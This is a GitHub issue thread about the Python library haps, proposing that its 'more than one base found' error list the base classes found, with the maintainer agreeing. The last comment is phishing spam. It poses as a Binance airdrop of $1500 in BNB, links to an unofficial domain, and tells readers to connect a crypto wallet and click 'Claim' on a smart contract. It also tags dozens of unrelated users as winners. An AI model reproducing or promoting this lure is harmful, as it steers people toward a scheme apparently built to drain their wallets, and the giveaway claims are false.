### ISSUE TITLE
List superfluous bases on ambiguity

### ISSUE THREAD

**Issue by JosXa** [ekiro/haps#15]
The ["too many bases" error](https://github.com/lunarwings/haps/blob/master/haps/container.py#L165) does not tell you which bases haps has found during autodiscovery:
`"More than one base found for %r" % implementation`

The error message could easily tell you which base classes were found as this parameter is available.

**Comment by JosXa** [comment]
I'm a noob at the `%` string formatting syntax, but if it's allowed to change this to .format or f-strings I'll make a PR.

**Comment by ekiro** [comment]
@JosXa thanks! Feel free to make PR. Haps no longer have backward compatibility with older versions of Python, so you can use f-strings to do that.

**Comment by JosXa** [comment]
What's lowest py version right now?

**Comment by ekiro** [comment]
You can check this in setup.py - right now it's 3.6

**Comment by yehyabelhadad** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @DailySuicide, @treedrunk, @bobtobob, @flightcom, @notflip, @fractalawareness, @Wings22Actual, @pschulzk, @leadmanager05, @ohjho, @xandermacha, @Nitheesh-S, @daji777, @rufkeya, @jsreed, @langhai8045, @zhangarejiu, @TimvanScherpenzeel, @abuasifkhan, @ntsd, @terrygm1957, @DanielBodnar, @vonlooten, @DenisRebenok, @redian, @545314690, @ArtyT, @hazemstocks, @gngn18, @AlohaJava, @badsector666, @kennethchung317, @Sifcoon, @markthethomas, @breezechen, @Carbinerrr, @MightySahand, @burialstance, @Kledal, @rocpjunior, @Doshe6909, @lbgws2, @Mohamed-elg, @ar4ft, @dec0dOS, @ahuss949, @gaozhitw, @AinuX, @angryno1, @renlulu
